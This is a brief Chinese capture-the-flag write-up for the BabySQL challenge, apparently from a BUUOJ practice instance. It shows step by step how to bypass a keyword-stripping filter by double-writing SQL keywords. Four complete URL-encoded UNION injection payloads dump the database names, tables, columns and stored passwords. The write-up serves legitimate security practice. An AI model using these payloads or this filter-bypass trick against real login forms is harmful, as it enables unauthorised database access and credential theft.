[极客大挑战 2019]BabySQL
[极客大挑战 2019]BabySQL
首先简单测试一下题目
0x00
发现from union select 这些关键函数都被替换为空,那么猜测这道题目是一道双写绕过的SQL注入题
0x01
尝试爆破数据库名
http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(schema_name)%20frfromom%20infoorrmation_schema.schemata%20%23
然后我们发现了ctf库,推测这个库中藏有flag
0x02
爆破数据表
http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23
0x03
查询列名
http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
0x04
查询字段名
http://714be2fb-b39b-488b-83f2-f8ec05927586.node3.buuoj.cn/check.php?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23
0x05
acc
End
